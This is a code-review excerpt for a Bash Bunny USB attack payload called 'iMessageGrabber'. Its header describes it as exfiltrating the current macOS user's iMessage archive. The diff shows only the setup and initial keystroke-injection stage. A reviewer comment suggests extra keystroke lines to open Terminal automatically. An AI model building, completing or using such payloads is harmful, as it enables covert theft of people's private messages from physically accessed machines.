payloads/library/exfiltration/iMessageGrabber/payload.txt

```diff
@@ -0,0 +1,40 @@
+# Title:         iMessageGrabber
+# Description:   Exfiltrates the iMessage archive of the current user
+# Author:        GermanNoob
+# Props:         wiredBrother
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        MacOS (iMessage)
+# Attackmodes:   HID, STORAGE
+
+#options - Define the name of the BashBunny volume
+bashbunnyvolume=BASHBUNNY
+
+LED SETUP
+mkdir /root/udisk/loot/iMessage
+lootdir=/Volumes/$bashbunnyvolume/loot/iMessage/
+if [ -f /root/udisk/loot/iMessage/finished ]
+then
+	rm /root/udisk/loot/iMessage/finished
+fi
+
+#### INITIAL STAGE #####
+
+ATTACKMODE HID STORAGE
+LED ATTACK
+RUN OSX terminal
+Q WAIT 500
```

Comment:
There is nothing here actually opening the terminal. If this is intended please include in a comment that the user needs to have the terminal open. You can automate this process by doing. 

```
QUICK GUI SPACE 
QUACK STRING Terminal 
QUACK STRING ENTER
```